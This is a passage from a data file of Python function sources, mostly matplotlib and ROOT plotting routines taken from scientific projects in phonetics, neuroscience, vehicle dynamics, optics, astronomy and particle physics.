2)\n plt.title('B')\n ids.plot_phoneme_articulation(tdatlst_f2, target_f2, labels, ax=ax2,\n indices=indices)\n ax2.set_ylim(ax1.get_ylim())\n\n plt.savefig('fig-2.png', dpi=300)\n\n # Variation (F1, F2, F3)\n # ---------------------\n plt.figure(tight_layout=True, facecolor='white', figsize=(9.5, 3.5,))\n sns.set(rc={'axes.facecolor': '#e8e8e8'})\n ids.plot_phoneme_variation(tdatlst_f3, target_f3, labels)\n plt.savefig('fig-3.png', dpi=300)\n\n # ARI for different learning algorithms\n ari_file_f3 = os.path.join(DATADIR, 'omnirunf3.pkl')\n ari_file_f2 = os.path.join(DATADIR, '2FLearning_500ex.pkl')\n ari_ylabels = [\"ARI (F1, F2, F3)\", \"ARI (F1, F2)\"]\n sns.set(rc={'axes.facecolor': '#cccccc', 'grid.color': '#bbbbbb'})\n plot_compare([ari_file_f3, ari_file_f2], [500, 500], ari_ylabels,\n grayscale=True)\n plt.savefig('fig-4.png', dpi=300)\n\n # DPGMM ARI as a funciton of the number of samples\n # ------------------------------------------------\n f = plt.figure(tight_layout=True, facecolor='white', figsize=(7.5, 3.5,))\n sns.set(rc={'axes.facecolor': '#eeeeee', 'grid.color': '#d8d8d8'})\n ari_over_time_violin()\n plt.savefig('fig-5.png', dpi=300)", "def figure3():\n\n plot_settings = {'y_limits': [-75, -50],\n 'x_limits': None,\n 'y_ticks': [-75, -70, -65, -60, -55, -50],\n 'locator_size': 2.5,\n 'y_label': 'Voltage (mV)',\n 'x_ticks': [],\n 'scale_size': 2,\n 'x_label': \"\",\n 'scale_loc': 3,\n 'figure_name': 'figure_3',\n 'legend': ['0.1 $\\mu$S', '0.125 $\\mu$S', '0.15 $\\mu$S'],\n 'legend_size': 8,\n 'legend_location': 4,\n 'y_on': True}\n line_styles = ['-', 'dotted', '-.']\n\n plt.figure(figsize=(5, 3))\n plt.subplot(1, 2, 1) # Generate subplot 1 (left)\n for ix, g_t_bar in enumerate([0.1, 0.125, 0.15]):\n t, y = solver(6, g_t_bar=g_t_bar, t_start=0.5)\n plt.plot(t, y[:, 0], c='k', linestyle=line_styles[ix])\n alter_figure(plot_settings) # Alter figure for publication\n\n plt.subplot(1, 2, 2) # Generate subplot 2 (right)\n for ix, i_bias_on in enumerate([0, -0.1, -0.2]):\n \"\"\"\n First step (hyperpolarizing)\n \"\"\"\n t1 = 1000\n duration = t1\n\n t, y_hold = solver(t1, duration=duration, i_bias_on=i_bias_on)\n y_0 = y_hold[-1, :] # Create new initial conditions\n\n \"\"\"\n Second step (current pulse)\n \"\"\"\n t1 = 20\n t, y = solver(t1, t_start=0, y_hold=y_0)\n v = y[:, 0]\n\n \"\"\"\n Append the end of the first step onto the second step (for plotting purposes)\n \"\"\"\n len_pre = 100\n t = np.concatenate((np.linspace(-len_pre * np.diff(t)[0], -np.diff(t)[0], len_pre), t))\n v_bar = np.concatenate((y_hold[-len_pre:, 0], v))\n v_bar = v_bar - v_bar[0] + -7.16300325e+01 # Align solution to initial condition of the \"standard simulation\"\n\n plt.plot(t, v_bar, c='k', linestyle=line_styles[ix])\n\n plot_settings['y_ticks'] = []\n plot_settings['y_label'] = \"\"\n plot_settings['x_limits'] = [-1, 20]\n plot_settings['legend'] = ['-72 mV', '-75 mV', '-78 mV']\n plot_settings['scale_size'] = 5\n plot_settings['legend_location'] = 1\n alter_figure(plot_settings, close=True)", "def plot_plateau(x,y,p,n,Vdc):\n fig = plt.figure()\n ax = fig.add_subplot(111)\n ax.set_xlabel('Vrf [V]')\n ax.set_ylabel('Current [nA]')\n fig.suptitle('Vdc = '+str(Vdc)+' n = '+str(n), fontsize=24)\n \n plt.plot(x,y,'x',label='Experimental data') \n t = np.linspace(min(x),max(x),1000)\n plt.plot(t,f(t,p[0],p[1],p[2]),label='Fit')\n plt.axhline(y=n*e*frequency*1e9, color='black', linestyle='-')\n\n ax.legend()\n plt.show(block=True)\n plt.pause(0.3)\n plt.close()\n \n return None", "def wheel_disp_compare_plot(dictionary, a_x, a_y, corner_weights_static, time, data_lf, data_rf, data_lr, data_rr,\n velocity):\n # generate quarter elipse for all four tires\n weight = dictionary['Performance Figures']['Weight'][0]\n trackwidth_f = dictionary['Left Front']['Wheel Center'][1] - dictionary['Right Front']['Wheel Center'][1]\n trackwidth_r = dictionary['Left Front']['Wheel Center'][1] - dictionary['Right Front']['Wheel Center'][1]\n wheel_base = dictionary['Left Front']['Wheel Center'][0] - dictionary['Left Rear']['Wheel Center'][0]\n\n x_load_transfer = load_transfer(a_x, dictionary['Performance Figures']['Weight'][0], wheel_base,\n dictionary['Performance Figures']['Center of Gravity'][2])\n\n y_load_transfer = load_transfer(a_y, dictionary['Performance Figures']['Weight'][0], trackwidth_f,\n dictionary['Performance Figures']['Center of Gravity'][2])\n dynamics_loads = []\n accel_long = []\n accel_lat = []\n for x, y, a1, a2 in zip(x_load_transfer, y_load_transfer, a_x, a_y):\n lf = corner_weights_static[0] + x + y\n rf = corner_weights_static[1] + x - y\n lr = corner_weights_static[2] - x + y\n rr = corner_weights_static[3] - x - y\n # print 'dynamics loads', lf, rf, lr, rr\n dynamics_loads.append(np.array([lf, rf, lr, rr]))\n accel_long.append(np.array([a1, a1, a1, a1]))\n accel_lat.append(np.array([a2, a2, a2, a2]))\n # print dynamics_loads\n lat_tire_force = [load*a for load, a in zip(dynamics_loads, accel_lat)]\n long_tire_force = [load*a for load, a in zip(dynamics_loads, accel_long)]\n damper_displacements = []\n jacking_forces = []\n for ly, lx, v in zip(lat_tire_force, long_tire_force, velocity):\n # print 'lat_f', ly\n # print 'lat_x', lx\n displacements, jacking_f = four_corner_wheel_displacement(dictionary, ly, lx, v)\n damper_displacements.append(np.multiply(displacements, dictionary['Performance Figures']['Motion Ratio'][0:4]))\n jacking_forces.append(jacking_f)\n print jacking_forces\n\n ax = plt.subplot2grid((4, 2), (0, 0), projection='3d')\n ax2 = plt.subplot2grid((4, 2), (0, 1), projection='3d')\n ax3 = plt.subplot2grid((4, 2), (1, 0), projection='3d')\n ax4 = plt.subplot2grid((4, 2), (1, 1), projection='3d')\n ax5 = plt.subplot2grid((4, 2), (2, 0), projection='3d')\n ax6 = plt.subplot2grid((4, 2), (2, 1), projection='3d')\n ax7 = plt.subplot2grid((4, 2), (3, 0), colspan=2)\n\n ax.set_title('Damper Displacements')\n ax2.set_title('Normal Loads')\n ax3.set_title('Longitudinal Forces')\n ax4.set_title('Lateral Forces')\n ax5.set_title('Jacking Lateral')\n ax6.set_title('Jacking Longitudinal')\n ax7.set_title('Displacement vs Time')\n\n ax.plot(a_x, a_y, [x[0] for x in damper_displacements], c='r', label='lf')\n ax.plot(a_x, a_y, [x[1] for x in damper_displacements], c='orange', label='rf')\n ax.plot(a_x, a_y, [x[2] for x in damper_displacements], c='g', label='lr')\n ax.plot(a_x, a_y, [x[3] for x in damper_displacements], c='b', label='rr')\n\n ax2.plot(a_x, a_y, [x[0] for x in dynamics_loads], c='r', label='lf')\n ax2.plot(a_x, a_y, [x[1] for x in dynamics_loads], c='orange', label='rf')\n ax2.plot(a_x, a_y, [x[2] for x in dynamics_loads], c='g', label='lr')\n ax2.plot(a_x, a_y, [x[3] for x in dynamics_loads], c='b', label='rr')\n\n ax3.plot(a_x, a_y, [x[0] for x in long_tire_force], c='r', label='lf')\n ax3.plot(a_x, a_y, [x[1] for x in long_tire_force], c='orange', label='rf')\n ax3.plot(a_x, a_y, [x[2] for x in long_tire_force], c='g', label='lr')\n ax3.plot(a_x, a_y, [x[3] for x in long_tire_force], c='b', label='rr')\n\n ax4.plot(a_x, a_y, [x[0] for x in lat_tire_force], c='r', label='lf')\n ax4.plot(a_x, a_y, [x[1] for x in lat_tire_force], c='orange', label='rf')\n ax4.plot(a_x, a_y, [x[2] for x in lat_tire_force], c='g', label='lr')\n ax4.plot(a_x, a_y, [x[3] for x in lat_tire_force], c='b', label='rr')\n\n ax5.plot(a_x, a_y, [x[0] for x in jacking_forces], c='r', label='lf')\n ax5.plot(a_x, a_y, [x[1] for x in jacking_forces], c='orange', label='rf')\n ax5.plot(a_x, a_y, [x[2] for x in jacking_forces], c='g', label='lr')\n ax5.plot(a_x, a_y, [x[3] for x in jacking_forces], c='b', label='rr')\n\n ax6.plot(a_x, a_y, [x[4] for x in jacking_forces], c='r', label='lf')\n ax6.plot(a_x, a_y, [x[5] for x in jacking_forces], c='orange', label='rf')\n ax6.plot(a_x, a_y, [x[6] for x in jacking_forces], c='g', label='lr')\n ax6.plot(a_x, a_y, [x[7] for x in jacking_forces], c='b', label='rr')\n\n ax7.plot(time, [x[0] for x in damper_displacements], c='r', label='lf')\n ax7.plot(time, [x[1] for x in damper_displacements], c='orange', label='rf')\n ax7.plot(time, [x[2] for x in damper_displacements], c='g', label='lr')\n ax7.plot(time, [x[3] for x in damper_displacements], c='b', label='rr')\n ax7.plot(time, data_lf+.28, c='r', label='lf', linestyle=':')\n ax7.plot(time, data_rf+.28, c='orange', label='rf', linestyle=':')\n ax7.plot(time, data_lr+.35, c='g', label='lr', linestyle=':')\n ax7.plot(time, data_rr+.35, c='b', label='rr', linestyle=':')\n\n plt.legend()\n plt.show()\n return lat_tire_force, long_tire_force", "def _plot_arm(self):\n fig, axs = plt.subplots()\n fig.show()\n axs.cla()\n axs.axis([-1, 2.5, -1, 2.5])\n axs.plot([0], [0], 'o')\n config_plots = []\n for t_step in range(0, int(self._t_sim / self._dt) + 1, 1000):\n axs.plot([0, self._x_1[t_step]], [0, self._y_1[t_step]])\n axs.plot(self._x_1[t_step], self._y_1[t_step], 'o')\n axs.plot(\n [self._x_1[t_step], self._x_2[t_step]],\n [self._y_1[t_step], self._y_2[t_step]]\n )\n axs.plot(self._x_2[t_step], self._y_2[t_step], 'o')\n axs.plot(\n [self._x_2[t_step], self._x_e[t_step]],\n [self._y_2[t_step], self._y_e[t_step]]\n )\n axs.plot(self._x_e[t_step], self._y_e[t_step], 'ro')\n axs.plot(\n self._obj_coords_plot[t_step, 0, 0],\n self._obj_coords_plot[t_step, 1, 0], 'g+')\n axs.plot(\n self._obj_coords_plot[t_step, 0, 1],\n self._obj_coords_plot[t_step, 1, 1], 'g.')\n axs.plot(\n self._obj_coords_plot[t_step, 0, 2],\n self._obj_coords_plot[t_step, 1, 2], 'g.')\n axs.plot(\n self._obj_coords_plot[t_step, 0, 3],\n self._obj_coords_plot[t_step, 1, 3], 'g.')\n axs.plot(\n self._obj_coords_plot[t_step, 0, 4],\n self._obj_coords_plot[t_step, 1, 4], 'g.')\n plt.axis('off')\n plt.pause(1 / self._plot_fps)\n fig.canvas.draw()\n image = np.frombuffer(fig.canvas.tostring_rgb(), dtype='uint8')\n config_plots.append(image.reshape(\n fig.canvas.get_width_height()[::-1] + (3, )))\n\n # Draw and create image\n return config_plots", "def PCO1S12Noise():\n #Get data\n wdir = '/home/rallured/Dropbox/AXRO/Metrology/' \\\n 'NoiseStudy/TestOptics_PCO1S12/'\n d1,dx1 = met.read4DFits(wdir+'161202_PCO1S12_4InchCut_Avg8_Meas1.fits')\n d2,dx2 = met.read4DFits(wdir+'161202_PCO1S12_4InchCut_Avg8_Meas2.fits')\n d3,dx3 = met.read4DFits(wdir+'161202_PCO1S12_4InchCut_Avg8_Meas3.fits')\n\n #Construct power spectra\n f12,pow12 = fourier.meanPSD((d1-d2)[:,100:-100],\\\n win=np.hanning,dx=dx1,irregular=True)\n f23,pow23 = fourier.meanPSD((d2-d3)[:,100:-100],\\\n win=np.hanning,dx=dx1,irregular=True)\n f13,pow13 = fourier.meanPSD((d1-d3)[:,100:-100],\\\n win=np.hanning,dx=dx1,irregular=True)\n\n #Mid frequency\n midfreq = [1000*np.sqrt(np.sum(p[np.logical_and(f>.1,f<1.)])) \\\n for f,p in zip([f12,f23,f13],[pow12,pow23,pow13])]\n\n #Plot\n plt.loglog(f12,pow12/f12[0],label='1-2: %.2f' % midfreq[0])\n plt.loglog(f23,pow23/f23[0],label='2-3: %.2f' % midfreq[1])\n plt.loglog(f13,pow13/f13[0],label='1-3: %.2f' % midfreq[2])\n plt.legend(loc='lower left')\n plt.grid()\n plt.title('4D Repeatability: PCO1S12')\n plt.xlabel('Frequency (1/mm)')\n plt.ylabel('Power ($\\mu$m$^2$ mm)')\n\n print midfreq\n\n return f12,pow12", "def sac_paper_plot(log_dir, det_policy_sublocation,act_0,act_1,act_2,is_tri,actions_to_plot_large=10,\n actions_to_plot_small = 100,actions_per_log = 6000, custom_colors=None,prot_linewidth=2.7,\n reward_linewidth = None,plot_file_name = None,small_action_ylim=None,large_action_ylim=None,\n reward_ylim=None,reward_ylabel=None, reward_plot_extra_args = None,\n reward_plot_extra_kwargs = None,extra_cycles=None,extra_cycles_linewidth=None,\n reward_legend_labels=None,action_legend_lines=None,action_legend_text=None,\n action_legend_location=None):\n\n #get location of files\n running_reward_file, _, actions_file = \\\n sac_logs_file_location(log_dir, is_tri, None,None,None)\n\n #font size\n matplotlib.rcParams.update({'font.size': 14, \"text.usetex\": True,\n 'text.latex.preamble' : r'\\usepackage{amsmath}\\usepackage{physics}'})\n\n #create the axis (subplots)\n fig = plt.figure(constrained_layout=True, figsize=(6,5))\n gs = gridspec.GridSpec(3, 3, figure=fig, height_ratios = [1,0.7,1])\n reward_ax = fig.add_subplot(gs[0, :])\n prot_0_ax = fig.add_subplot(gs[1, 0])\n prot_1_ax = fig.add_subplot(gs[1, 1],sharey=prot_0_ax)\n prot_2_ax = fig.add_subplot(gs[1, 2],sharey=prot_0_ax)\n prot_final_ax = fig.add_subplot(gs[2, :])\n plt.setp(prot_1_ax.get_yticklabels(), visible=False)\n plt.setp(prot_2_ax.get_yticklabels(), visible=False) \n\n #set the reward axis\n plot_running_reward_on_axis(running_reward_file, reward_ax, plot_to_file_line = None, linewidth=reward_linewidth,\n custom_color = \"black\", lines_to_mark = [nearest_int(act_0/actions_per_log),\n nearest_int(act_1/actions_per_log),nearest_int(act_2/actions_per_log)],\n custom_mark_color=\"black\",ylim=reward_ylim,ylabel=reward_ylabel,\n plot_extra_args=reward_plot_extra_args, plot_extra_kwargs=reward_plot_extra_kwargs,\n legend_labels=reward_legend_labels)\n\n #set the three actions axis\n plot_actions_on_axis(actions_file, prot_0_ax, is_tri=is_tri, actions_to_plot=actions_to_plot_small,\n actions_ylim=small_action_ylim,plot_to_file_line=act_0,\n custom_colors=custom_colors,constant_steps=True, linewidth = prot_linewidth,\n two_xticks=True)\n plot_actions_on_axis(actions_file, prot_1_ax, is_tri=is_tri, actions_to_plot=actions_to_plot_small,\n plot_to_file_line=act_1,ylabel=\"\",custom_colors=custom_colors,\n constant_steps=True, linewidth = prot_linewidth,two_xticks=True)\n plot_actions_on_axis(actions_file, prot_2_ax, is_tri=is_tri, actions_to_plot=actions_to_plot_small,\n plot_to_file_line=act_2, ylabel=\"\",custom_colors=custom_colors,\n constant_steps=True, linewidth = prot_linewidth, two_xticks=True)\n\n #set the final protocol axis\n plot_actions_on_axis(log_dir + det_policy_sublocation, prot_final_ax, is_tri, actions_to_plot=actions_to_plot_large,\n actions_ylim=large_action_ylim,plot_to_file_line=None,\n custom_colors=custom_colors, constant_steps=True, k_notation=False, x_count_from_zero=True,\n linewidth = prot_linewidth, xlabel=\"$t[dt]$\",extra_cycles=extra_cycles,\n extra_cycles_linewidth=extra_cycles_linewidth, legend_lines=action_legend_lines,\n legend_text=action_legend_text, legend_location=action_legend_location)\n\n #add the (a) (b) (c) labels\n reward_ax.text(-0.11,-0.38, r'\\textbf{(a)}', transform=reward_ax.transAxes )\n prot_0_ax.text(-0.4,-0.55, r'\\textbf{(b)}', transform=prot_0_ax.transAxes )\n prot_final_ax.text(-0.11,-0.38, r'\\textbf{(c)}', transform=prot_final_ax.transAxes )\n\n #save if necessary\n if plot_file_name is not None:\n plot_folder = os.path.join(log_dir, PLOT_DIR_NAME)\n Path(plot_folder).mkdir(parents=True, exist_ok=True)\n plot_file_name = os.path.join(plot_folder, plot_file_name)\n plt.savefig(plot_file_name)\n\n #show\n plt.show()", "def generatePlot(data):\n addendum = \"\"\n destination = \"D:\\\\Research\\\\scripts\\\\Results\\\\FullSet1\\\\$FilteredPlots\\\\take 4\\\\\"\n if len(data.detections.smallIncrease) != 0:\n addendum = \"small increases\\\\\"\n if len(data.detections.smallDecrease) != 0:\n addendum = \"small decreases\\\\\"\n if len(data.detections.largeIncrease) != 0:\n addendum = \"large increases\\\\\"\n if len(data.detections.largeDecrease) != 0:\n addendum = \"large decreases\\\\\"\n if addendum == \"\":\n addendum = \"no decreases\\\\\"\n \n plt.figure(1)\n plt.subplot(211)\n #print np.min(data.magdata), np.max(data.magdata)\n axes = plt.gca()\n axes.set_title(\"Year: '{year}, Day: {day}\".format(year=data.calendarDay[:2], day=data.calendarDay[3:] ))\n axes.set_ylim([np.min(data.magdata)-1.2,np.max(data.magdata)+0.25])\n axes.set_ylabel(r'$\\mathbf{B}$ (nT)' )\n\n #plot formatting\n formats = dates.DateFormatter('%H:%M:%S')\n axes.xaxis.set_major_locator(dates.MinuteLocator())\n axes.xaxis.set_major_formatter(formats)\n \n br, = pp.plot(dates.date2num(data.timestamps),[row[0] for row in data.magdata],label='$B_r$')\n bt, = pp.plot(dates.date2num(data.timestamps),[row[1] for row in data.magdata],label='$B_t$')\n bn, = pp.plot(dates.date2num(data.timestamps),[row[2] for row in data.magdata],label='$B_n$')\n b0, = pp.plot(dates.date2num(data.timestamps),[row[3] for row in data.magdata],label='$B_0$')\n print len(data.detections.rotationBoundary)\n if len(data.detections.rotationBoundary) == 1:\n rotation, = pp.plot([dates.date2num(data.detections.rotationBoundary), dates.date2num(data.detections.rotationBoundary)], [np.min(data.magdata)-1,np.max(data.magdata)+0.25], linestyle='--', color = 'm', alpha = 0.4, label='$RB$')\n else:\n for index, value in enumerate(data.detections.rotationBoundary):\n rotation, = pp.plot([dates.date2num(value), dates.date2num(value)], [np.min(data.magdata)-1,np.max(data.magdata)+0.25], linestyle='--', color = 'm', alpha = 0.4, label='$RB$')\n if len(data.detections.rotationBoundary) != 0:\n pp.legend(handles=[br,bt,bn,b0,rotation], loc='lower left', ncol=4, fancybox=True, framealpha=0.5)\n else:\n pp.legend(handles=[br,bt,bn,b0], loc='lower left', ncol=4, fancybox=True, framealpha=0.5)\n\n start, end = axes.get_xlim()\n axes.xaxis.set_ticks(np.arange(start, end, (end-start)/5))\n \n \n\n plt.subplot(212)\n axes2 = plt.gca()\n #plot formatting\n formats = dates.DateFormatter('%H:%M:%S')\n axes2.xaxis.set_major_locator(dates.MinuteLocator())\n axes2.xaxis.set_major_formatter(formats)\n axes2.set_ylabel(r'$\\theta$ (deg)' )\n rotations, = pp.plot(dates.date2num(data.detections.rotationTimeTags),data.detections.rotations)\n #pp.legend(handles=[rotations], loc='lower left', ncol=4, fancybox=True, framealpha=0.5)\n \n\n outplotname = 'Plot ' + str(len(os.listdir(destination+addendum)) + 1)+ ' ' + data.timestamps[0].strftime('%y-%j-%H%M%S') + '.pdf'\n completename = os.path.join(destination+addendum,outplotname)\n plt.savefig(completename, bboxinches='tight')\n plt.clf()\n\n outplotname = 'Plot ' + str(len(os.listdir(destination+'rawdata\\\\'+addendum)) + 1)+ ' ' + data.timestamps[0].strftime('%y-%j-%H%M%S') + ' rawdata.csv'\n completename1 = os.path.join(destination+'rawdata\\\\'+addendum,outplotname)\n generateDataFile(data.rawdata,completename1)\n\n print \"Done generating plot...\"", "def apolco(a,minfeh=-3,out=None) :\n apo=np.where((a['TELESCOPE'] == 'apo25m') & (a['RV_FEH']>minfeh) )[0]\n fig=vscat(a[apo],marker='o',density=True)\n lco=np.where((a['TELESCOPE'] == 'lco25m') & (a['RV_FEH']>minfeh) )[0]\n vscat(a[lco],fig=fig,ls=':',marker='+',density=True)\n if out is not None : \n fig[0].savefig(out+'_1.png')\n plt.close()\n i1,i2=match.match(a['APOGEE_ID'][apo],a['APOGEE_ID'][lco])\n print('matched {:d} stars'.format(len(i1)))\n fig,ax=plots.multi(1,2)\n #plots.plotp(ax[0,0],a['SNR'][apo[i1]],a['VHELIO_AVG'][apo[i1]]-a['VHELIO_AVG'][lco[i2]],yr=[-3,3],yt=r'$\\Delta$ VHELIO_AVG',xt='S/N')\n #plots.plotp(ax[0,1],a['SNR'][apo[i1]],a['VHELIO_AVG'][apo[i1]]-a['VHELIO_AVG'][lco[i2]],yr=[-50,50],yt=r'$\\Delta$ VHELIO_AVG',xt='S/N')\n #plots.plotp(ax[1,0],a['SNR'][apo[i1]],a['VSCATTER'][apo[i1]]-a['VSCATTER'][lco[i2]],yr=[-0.5,0.5],yt=r'$\\Delta$ VSCATTER',xt='S/N')\n #plots.plotp(ax[1,1],a['SNR'][apo[i1]],a['VSCATTER'][apo[i1]]-a['VSCATTER'][lco[i2]],yr=[-5,5],yt=r'$\\Delta$ VSCATTER',xt='S/N')\n ax[0].hist(a['VHELIO_AVG'][apo[i1]]-a['VHELIO_AVG'][lco[i2]],bins=np.arange(-0.5,0.5,0.02),histtype='step')\n ax[0].set_xlabel(r'$\\Delta$ VHELIO_AVG')\n ax[1].hist(a['VSCATTER'][apo[i1]]-a['VSCATTER'][lco[i2]],bins=np.arange(-0.25,0.25,0.01),histtype='step')\n ax[1].set_xlabel(r'$\\Delta$ VSCATTER')\n if out is not None : \n fig.savefig(out+'_2.png')\n plt.close()", "def plot_ENR_spectra(bolo_name, mass, analysis_type): \n\n\t#Load cut value on BDT output\n\tcut_val = 0 \n\twith open (\"./Text_files/\" + bolo_name + \"_BDT_cut_and_eff_\" + analysis_type + \".txt\", \"r\") as fcut:\n\t\tstuff = [elem.rstrip().split(\",\") for elem in fcut.readlines()]\n\t\tfor elem in stuff:\n\t\t\tmass_val = elem[0]\n\t\t\tif int(mass) ==int(mass_val):\n\t\t\t\tcut_val = float(elem[1])\n\t\n\tWIMP_gen_path = \"/home/irfulx204/mnt/tmain/Desktop/Run308_BDT_simu_corr/BDT_\" + bolo_name + \"/\" + analysis_type +\"/WIMP/ROOT_files/\"\n\tApplication_path = \"/home/irfulx204/mnt/tmain/Desktop/Run308_BDT_simu_corr/BDT_\" + bolo_name + \"/\" + analysis_type +\"/Application/\"\n\t\n\t#Load the WIMP trees\n\ttnocut, fnocut = PyRPl.open_ROOT_object(WIMP_gen_path + bolo_name + \"_WIMP_mass_\" + mass + \"_tree.root\", \"t_newnocut1\")\n\ttcut, fcut = PyRPl.open_ROOT_object(WIMP_gen_path + bolo_name + \"_WIMP_mass_\" + mass + \"_tree.root\", \"t_new1\")\n\ttBDTcut, fBDTcut = PyRPl.open_ROOT_object(Application_path + \"WIMP\" + \"_mass_\" + str(mass) + \"_tree.root\", \"tout\")\n\n\ttBDTcut.AddFriend(tcut)\n\t# tBDTcut.Draw(\"tout.NN:t_new1.ENR>>hist(100,2,8, 100,-2,2)\")\n\t# raw_input()\n\n\thWIMPnocut = TH1F(\"hWIMPnocut\", \"hWIMPnocut\", 100, 0, 15)\n\thWIMPcut = TH1F(\"hWIMPcut\", \"hWIMPcut\", 100, 0, 15)\n\thWIMPBDTcut = TH1F(\"hWIMPBDTcut\", \"hWIMPBDTcut\", 100, 0, 15)\n\n\ttnocut.Project(\"hWIMPnocut\", \"ENR\")\n\ttcut.Project(\"hWIMPcut\", \"ENR\")\n\ttBDTcut.Project(\"hWIMPBDTcut\", \"t_new1.ENR\", \"tout.NN>\" + str(cut_val))\n\n\n\tPyRPl.process_TH1(hWIMPnocut, X_title = \"ENR (keV)\", Y_title = \"Efficiency\", color = kBlack)\n\tPyRPl.process_TH1(hWIMPcut, X_title = \"ENR (keV)\", Y_title = \"Efficiency\", color = kRed)\n\tPyRPl.process_TH1(hWIMPBDTcut, X_title = \"ENR (keV)\", Y_title = \"Efficiency\", color = kBlue)\n\n\t#Set bin errors\n\tlist_hist = [hWIMPnocut, hWIMPcut, hWIMPBDTcut]\n\tfor h in list_hist:\n\t\tfor i in range(1,101):\n\t\t\th.SetBinError(i, TMath.Sqrt(h.GetBinContent(i)))\n\n\t# #Plot histograms as a check\n\t# hWIMPnocut.Draw(\"\")\t\n\t# hWIMPcut.Draw(\"same\")\t\n\t# hWIMPBDTcut.Draw(\"same\")\n\n\t# raw_input()\n\n\t# plot the efficiency functions\n\t# hWIMPcut.Divide(hWIMPnocut)\t\n\t# hWIMPBDTcut.Divide(hWIMPnocut)\t\n\t# hWIMPBDTcut.SetMarkerStyle(1)\n\t# hWIMPcut.SetMarkerStyle(1)\n\t# hWIMPcut.SetMinimum(0)\n\t# hWIMPcut.SetMaximum(1.5)\n\t# hWIMPcut.Draw(\"E1\")\t\n\t# hWIMPBDTcut.Draw(\"E1same\")\n\t\n\t# leg = TLegend(0.1934673,0.5813953,0.5037688,0.7043189,\"\",\"brNDC\")\n\t# leg.AddEntry(hWIMPcut.GetName(), \"Pre selection cut\", \"leg\")\n\t# leg.AddEntry(hWIMPBDTcut.GetName(),\"BDT cut\" ,\"leg\")\n\t# leg.SetFillColor(kWhite)\n\t# leg.SetBorderSize(0)\n\t# leg.Draw(\"same\")\n\n\tteff1 = TEfficiency(hWIMPcut, hWIMPnocut)\n\tteff2 = TEfficiency(hWIMPBDTcut, hWIMPnocut)\n\n\n\tteff1.SetName(\"teff1\")\n\tteff2.SetName(\"teff2\")\n\n\tteff1.SetLineColor(kRed)\n\tteff1.Draw()\n\tteff2.Draw(\"same\")\n\n\tleg = TLegend(0.1934673,0.5813953,0.5037688,0.7043189,\"\",\"brNDC\")\n\tleg.AddEntry(teff1.GetName(), \"Pre selection cut\", \"leg\")\n\tleg.AddEntry(teff2.GetName(),\"Pre selection + BDT cut\" ,\"leg\")\n\tleg.SetFillColor(kWhite)\n\tleg.SetBorderSize(0)\n\tleg.Draw(\"same\")\n\t\n\traw_input()\n\n\n\tc1.Print(\"./Figures/\" + bolo_name + \"_efficiency_mass_\" + str(mass) + \"_baseline_time.eps\")", "def plot_omni_quicklook(self, flux_opts=None, eflux_opts=None,\n hflux_opts=None, oflux_opts=None):\n import matplotlib.pyplot as plt\n import matplotlib.gridspec as gridspec\n \n fig=plt.figure(figsize=(11,7))\n fig.subplots_adjust(left=0.07, right=0.99, bottom=0.19, \n top=0.94, wspace=0.4, hspace=0.25)\n gs=gridspec.GridSpec(3,3)\n\n # Do orbits first.\n a1=fig.add_subplot(gs[0,0])\n a2=fig.add_subplot(gs[1,0])\n a3=fig.add_subplot(gs[2,0])\n self.add_orbit_plot('XY', target=a1)\n self.add_orbit_plot('XZ', target=a2)\n self.add_orbit_plot('YZ', target=a3)\n\n # Add fluxes.\n a1=fig.add_subplot(gs[0,1:])\n a2=fig.add_subplot(gs[1,1:])\n a3=fig.add_subplot(gs[2,1:])\n if eflux_opts is None:\n eflux_opts = {}\n if hflux_opts is None:\n hflux_opts = {}\n if oflux_opts is None:\n oflux_opts = {}\n if flux_opts is None:\n flux_opts = {}\n for k in flux_opts:\n for d in (eflux_opts, hflux_opts, oflux_opts):\n if not k in d:\n d[k] = flux_opts[k]\n self.add_omniflux_plot('omnie', target=a1, no_xlabels=True,\n **eflux_opts)\n self.add_omniflux_plot('omniH', target=a2, no_xlabels=True,\n **hflux_opts)\n self.add_omniflux_plot('omniO', target=a3, do_orbticks=True,\n **oflux_opts)\n \n return fig", "def plot(self):\n\t\tself.plotOfSpect()", "def test4():\n\t\n\tprint('This takes a while to compute - be patient!')\n\t\n\td = np.linspace(-15000,15000,300)\n\t#Voigt\n\t#p_dict = {'Bfield':700,'rb85frac':1,'Btheta':90*np.pi/180,'lcell':75e-3,'T':84,'Dline':'D2','Elem':'Cs'}\n\tp_dict = {'Bfield':1000,'rb85frac':1,'Btheta':88*np.pi/180,'Bphi':00*np.pi/180,'lcell':75e-3,'T':93,'Dline':'D2','Elem':'Cs'}\n\tpol = np.array([1.0,0.0,0.0])\n\tTVx = get_spectra(d,pol,p_dict,outputs=['I_M45','I_P45','Ix','Iy','S0','Iz'])\n\t\n\tfig2 = plt.figure()\n\tax1a = fig2.add_subplot(411)\n\tax2a = fig2.add_subplot(412,sharex=ax1a)\n\tax3a = fig2.add_subplot(413,sharex=ax1a)\n\tax4a = fig2.add_subplot(414,sharex=ax1a)\n\t\n\tax1a.plot(d,TVx[0],'r',lw=2,label=r'$I_{-45}$')\n\tax2a.plot(d,TVx[1],'b',lw=2,label=r'$I_{+45}$')\n\tax3a.plot(d,TVx[2],'r',lw=2,label=r'$I_x$')\n\tax4a.plot(d,TVx[3],'b',lw=2,label=r'$I_y$')\n\tax4a.plot(d,TVx[0]+TVx[1],'r:',lw=3.5,label=r'$I_{+45}+I_{-45}$')\n\tax4a.plot(d,TVx[2]+TVx[3],'k:',lw=2.5,label=r'$I_x + I_y$')\n\tax4a.plot(d,TVx[4],'g--',lw=1.5,label='$S_0$')\n#\tax4a.plot(d,TVx[5],'c--',lw=2.5,label='$I_z$')\n\t\n\t\n\tax4a.set_xlabel('Detuning (MHz)')\n\tax1a.set_ylabel('I -45')\n\tax2a.set_ylabel('I +45')\n\tax3a.set_ylabel('Ix')\n\tax4a.set_ylabel('Iy')\n\t\n\tax4a.set_xlim(d[0],d[-1]+3000)\n\tax4a.legend(loc=0)\n\t\n\tplt.show()", "def plot(self):\n\t\t\t\n\t\tfig,p1=_plt.subplots(4,sharex=True)\n\t\tp1[0].plot(self.time*1e3,self.eRogA,label='Rogowski A')\n\t\tp1[1].plot(self.time*1e3,self.eRogB,label='Rogowski B')\n\t\tp1[2].plot(self.time*1e3,self.eRogC,label='Rogowski C')\n\t\tp1[3].plot(self.time*1e3,self.eRogD,label='Rogowski D')\n\t\t_plot.finalizeSubplot(p1,xlabel='Time (ms)',ylabel='Current (A)')\n\t\t_plot.finalizeFigure(fig,title=self.title)\n\t\t\n\t\treturn p1", "def 